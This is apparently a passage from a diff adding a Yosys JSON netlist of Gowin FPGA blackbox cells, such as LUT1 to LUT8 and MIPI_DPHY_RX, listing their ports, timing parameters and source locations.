"bits": [ 6 ] + }, + "Q1": { + "direction": "output", + "bits": [ 7 ] + }, + "Q0": { + "direction": "output", + "bits": [ 8 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 9 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 10 ] + }, + "RESET": { + "direction": "input", + "bits": [ 11 ] + }, + "CALIB": { + "direction": "input", + "bits": [ 12 ] + }, + "D": { + "direction": "input", + "bits": [ 13 ] + } + }, + "cells": { + }, + "netnames": { + "CALIB": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:812.8-812.13" + } + }, + "D": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:808.8-808.9" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:809.8-809.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:810.8-810.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:820.9-820.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:819.9-819.11" + } + }, + "Q2": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:818.9-818.11" + } + }, + "Q3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:817.9-817.11" + } + }, + "Q4": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:816.9-816.11" + } + }, + "Q5": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:815.9-815.11" + } + }, + "Q6": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:814.9-814.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:811.8-811.13" + } + } + } + }, + "LUT1": { + "attributes": { + "abc9_lut": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:2.1-8.10" + }, + "parameter_default_values": { + "INIT": "00" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + } + }, + "cells": { + "$specify$24": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001110000110", + "T_FALL_MIN": "00000000000000000000001110000110", + "T_FALL_TYP": "00000000000000000000001110000110", + "T_RISE_MAX": "00000000000000000000001000101011", + "T_RISE_MIN": "00000000000000000000001000101011", + "T_RISE_TYP": "00000000000000000000001000101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:5.3-5.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:2.20-2.21" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:2.29-2.31" + } + } + } + }, + "LUT2": { + "attributes": { + "abc9_lut": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:11.1-19.10" + }, + "parameter_default_values": { + "INIT": "0000" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + } + }, + "cells": { + "$specify$25": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010010100000", + "T_FALL_MIN": "00000000000000000000010010100000", + "T_FALL_TYP": "00000000000000000000010010100000", + "T_RISE_MAX": "00000000000000000000001101100011", + "T_RISE_MIN": "00000000000000000000001101100011", + "T_RISE_TYP": "00000000000000000000001101100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:14.3-14.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$26": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001110000110", + "T_FALL_MIN": "00000000000000000000001110000110", + "T_FALL_TYP": "00000000000000000000001110000110", + "T_RISE_MAX": "00000000000000000000001000101011", + "T_RISE_MIN": "00000000000000000000001000101011", + "T_RISE_TYP": "00000000000000000000001000101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:15.3-15.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:11.20-11.21" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:11.29-11.31" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:11.33-11.35" + } + } + } + }, + "LUT3": { + "attributes": { + "abc9_lut": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:22.1-32.10" + }, + "parameter_default_values": { + "INIT": "00000000" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + } + }, + "cells": { + "$specify$27": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010111001110", + "T_FALL_MIN": "00000000000000000000010111001110", + "T_FALL_TYP": "00000000000000000000010111001110", + "T_RISE_MAX": "00000000000000000000010000011110", + "T_RISE_MIN": "00000000000000000000010000011110", + "T_RISE_TYP": "00000000000000000000010000011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:25.3-25.28" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$28": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010010100000", + "T_FALL_MIN": "00000000000000000000010010100000", + "T_FALL_TYP": "00000000000000000000010010100000", + "T_RISE_MAX": "00000000000000000000001101100011", + "T_RISE_MIN": "00000000000000000000001101100011", + "T_RISE_TYP": "00000000000000000000001101100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:26.3-26.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$29": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001110000110", + "T_FALL_MIN": "00000000000000000000001110000110", + "T_FALL_TYP": "00000000000000000000001110000110", + "T_RISE_MAX": "00000000000000000000001000101011", + "T_RISE_MIN": "00000000000000000000001000101011", + "T_RISE_TYP": "00000000000000000000001000101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:27.3-27.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:22.20-22.21" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:22.29-22.31" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:22.33-22.35" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:22.37-22.39" + } + } + } + }, + "LUT4": { + "attributes": { + "abc9_lut": "00000000000000000000000000000001", + "blackbox": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.1-47.10" + }, + "parameter_default_values": { + "INIT": "0000000000000000" + }, + "ports": { + "F": { + "direction": "output", + "bits": [ 2 ] + }, + "I0": { + "direction": "input", + "bits": [ 3 ] + }, + "I1": { + "direction": "input", + "bits": [ 4 ] + }, + "I2": { + "direction": "input", + "bits": [ 5 ] + }, + "I3": { + "direction": "input", + "bits": [ 6 ] + } + }, + "cells": { + "$specify$30": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010111001110", + "T_FALL_MIN": "00000000000000000000010111001110", + "T_FALL_TYP": "00000000000000000000010111001110", + "T_RISE_MAX": "00000000000000000000010000011110", + "T_RISE_MIN": "00000000000000000000010000011110", + "T_RISE_TYP": "00000000000000000000010000011110" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:38.3-38.28" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 3 ] + } + }, + "$specify$31": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000011000101111", + "T_FALL_MIN": "00000000000000000000011000101111", + "T_FALL_TYP": "00000000000000000000011000101111", + "T_RISE_MAX": "00000000000000000000010000011101", + "T_RISE_MIN": "00000000000000000000010000011101", + "T_RISE_TYP": "00000000000000000000010000011101" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:39.3-39.28" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 4 ] + } + }, + "$specify$32": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000010010100000", + "T_FALL_MIN": "00000000000000000000010010100000", + "T_FALL_TYP": "00000000000000000000010010100000", + "T_RISE_MAX": "00000000000000000000001101100011", + "T_RISE_MIN": "00000000000000000000001101100011", + "T_RISE_TYP": "00000000000000000000001101100011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:40.3-40.27" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 5 ] + } + }, + "$specify$33": { + "hide_name": 1, + "type": "$specify2", + "parameters": { + "DST_WIDTH": "00000000000000000000000000000001", + "FULL": "0", + "SRC_DST_PEN": "0", + "SRC_DST_POL": "0", + "SRC_WIDTH": "00000000000000000000000000000001", + "T_FALL_MAX": "00000000000000000000001110000110", + "T_FALL_MIN": "00000000000000000000001110000110", + "T_FALL_TYP": "00000000000000000000001110000110", + "T_RISE_MAX": "00000000000000000000001000101011", + "T_RISE_MIN": "00000000000000000000001000101011", + "T_RISE_TYP": "00000000000000000000001000101011" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:41.3-41.26" + }, + "port_directions": { + "DST": "input", + "EN": "input", + "SRC": "input" + }, + "connections": { + "DST": [ 2 ], + "EN": [ "1" ], + "SRC": [ 6 ] + } + } + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.20-35.21" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.29-35.31" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.33-35.35" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.37-35.39" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:35.41-35.43" + } + } + } + }, + "LUT5": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:51.1-55.10" + }, + "parameter_default_values": { + "INIT": "00000000000000000000000000000000" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "F": { + "direction": "output", + "bits": [ 7 ] + } + }, + "cells": { + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:54.8-54.9" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:53.7-53.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:53.11-53.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:53.15-53.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:53.19-53.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:53.23-53.25" + } + } + } + }, + "LUT6": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:58.1-62.10" + }, + "parameter_default_values": { + "INIT": "0000000000000000000000000000000000000000000000000000000000000000" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "F": { + "direction": "output", + "bits": [ 8 ] + } + }, + "cells": { + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:61.8-61.9" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.7-60.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.11-60.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.15-60.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.19-60.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.23-60.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:60.27-60.29" + } + } + } + }, + "LUT7": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:65.1-69.10" + }, + "parameter_default_values": { + "INIT": "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "I6": { + "direction": "input", + "bits": [ 8 ] + }, + "F": { + "direction": "output", + "bits": [ 9 ] + } + }, + "cells": { + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:68.8-68.9" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.7-67.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.11-67.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.15-67.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.19-67.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.23-67.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.27-67.29" + } + }, + "I6": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:67.31-67.33" + } + } + } + }, + "LUT8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:72.1-76.10" + }, + "parameter_default_values": { + "INIT": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" + }, + "ports": { + "I0": { + "direction": "input", + "bits": [ 2 ] + }, + "I1": { + "direction": "input", + "bits": [ 3 ] + }, + "I2": { + "direction": "input", + "bits": [ 4 ] + }, + "I3": { + "direction": "input", + "bits": [ 5 ] + }, + "I4": { + "direction": "input", + "bits": [ 6 ] + }, + "I5": { + "direction": "input", + "bits": [ 7 ] + }, + "I6": { + "direction": "input", + "bits": [ 8 ] + }, + "I7": { + "direction": "input", + "bits": [ 9 ] + }, + "F": { + "direction": "output", + "bits": [ 10 ] + } + }, + "cells": { + }, + "netnames": { + "F": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:75.8-75.9" + } + }, + "I0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.7-74.9" + } + }, + "I1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.11-74.13" + } + }, + "I2": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.15-74.17" + } + }, + "I3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.19-74.21" + } + }, + "I4": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.23-74.25" + } + }, + "I5": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.27-74.29" + } + }, + "I6": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.31-74.33" + } + }, + "I7": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:74.35-74.37" + } + } + } + }, + "MCU": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1601.1-1602.10" + }, + "ports": { + }, + "cells": { + }, + "netnames": { + } + }, + "MIPI_DPHY_RX": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1944.1-1984.10" + }, + "parameter_default_values": { + "ALIGN_BYTE": "10111000", + "MIPI_CK_EN": "1", + "MIPI_LANE0_EN": "0", + "MIPI_LANE1_EN": "0", + "MIPI_LANE2_EN": "0", + "MIPI_LANE3_EN": "0", + "SYNC_CLK_SEL": "1" + }, + "ports": { + "D0LN_HSRXD": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 ] + }, + "D1LN_HSRXD": { + "direction": "output", + "bits": [ 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33 ] + }, + "D2LN_HSRXD": { + "direction": "output", + "bits": [ 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49 ] + }, + "D3LN_HSRXD": { + "direction": "output", + "bits": [ 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65 ] + }, + "D0LN_HSRXD_VLD": { + "direction": "output", + "bits": [ 66 ] + }, + "D1LN_HSRXD_VLD": { + "direction": "output", + "bits": [ 67 ] + }, + "D2LN_HSRXD_VLD": { + "direction": "output", + "bits": [ 68 ] + }, + "D3LN_HSRXD_VLD": { + "direction": "output", + "bits": [ 69 ] + }, + "DI_LPRX0_N": { + "direction": "output", + "bits": [ 70 ] + }, + "DI_LPRX0_P": { + "direction": "output", + "bits": [ 71 ] + }, + "DI_LPRX1_N": { + "direction": "output", + "bits": [ 72 ] + }, + "DI_LPRX1_P": { + "direction": "output", + "bits": [ 73 ] + }, + "DI_LPRX2_N": { + "direction": "output", + "bits": [ 74 ] + }, + "DI_LPRX2_P": { + "direction": "output", + "bits": [ 75 ] + }, + "DI_LPRX3_N": { + "direction": "output", + "bits": [ 76 ] + }, + "DI_LPRX3_P": { + "direction": "output", + "bits": [ 77 ] + }, + "DI_LPRXCK_N": { + "direction": "output", + "bits": [ 78 ] + }, + "DI_LPRXCK_P": { + "direction": "output", + "bits": [ 79 ] + }, + "RX_CLK_O": { + "direction": "output", + "bits": [ 80 ] + }, + "DESKEW_ERROR": { + "direction": "output", + "bits": [ 81 ] + }, + "CK_N": { + "direction": "inout", + "bits": [ 82 ] + }, + "CK_P": { + "direction": "inout", + "bits": [ 83 ] + }, + "RX0_N": { + "direction": "inout", + "bits": [ 84 ] + }, + "RX0_P": { + "direction": "inout", + "bits": [ 85 ] + }, + "RX1_N": { + "direction": "inout", + "bits": [ 86 ] + }, + "RX1_P": { + "direction": "inout", + "bits": [ 87 ] + }, + "RX2_N": { + "direction": "inout", + "bits": [ 88 ] + }, + "RX2_P": { + "direction": "inout", + "bits": [ 89 ] + }, + "RX3_N": { + "direction": "inout", + "bits": [ 90 ] + }, + "RX3_P": { + "direction": "inout", + "bits": [ 91 ] + }, + "LPRX_EN_CK": { + "direction": "input", + "bits": [ 92 ] + }, + "LPRX_EN_D0": { + "direction": "input", + "bits": [ 93 ] + }, + "LPRX_EN_D1": { + "direction": "input", + "bits": [ 94 ] + }, + "LPRX_EN_D2": { + "direction": "input", + "bits": [ 95 ] + }, + "LPRX_EN_D3": { + "direction": "input", + "bits": [ 96 ] + }, + "HSRX_ODTEN_CK": { + "direction": "input", + "bits": [ 97 ] + }, + "HSRX_ODTEN_D0": { + "direction": "input", + "bits": [ 98 ] + }, + "HSRX_ODTEN_D1": { + "direction": "input", + "bits": [ 99 ] + }, + "HSRX_ODTEN_D2": { + "direction": "input", + "bits": [ 100 ] + }, + "HSRX_ODTEN_D3": { + "direction": "input", + "bits": [ 101 ] + }, + "D0LN_HSRX_DREN": { + "direction": "input", + "bits": [ 102 ] + }, + "D1LN_HSRX_DREN": { + "direction": "input", + "bits": [ 103 ] + }, + "D2LN_HSRX_DREN": { + "direction": "input", + "bits": [ 104 ] + }, + "D3LN_HSRX_DREN": { + "direction": "input", + "bits": [ 105 ] + }, + "HSRX_EN_CK": { + "direction": "input", + "bits": [ 106 ] + }, + "HS_8BIT_MODE": { + "direction": "input", + "bits": [ 107 ] + }, + "RX_CLK_1X": { + "direction": "input", + "bits": [ 108 ] + }, + "RX_INVERT": { + "direction": "input", + "bits": [ 109 ] + }, + "LALIGN_EN": { + "direction": "input", + "bits": [ 110 ] + }, + "WALIGN_BY": { + "direction": "input", + "bits": [ 111 ] + }, + "DO_LPTX0_N": { + "direction": "input", + "bits": [ 112 ] + }, + "DO_LPTX0_P": { + "direction": "input", + "bits": [ 113 ] + }, + 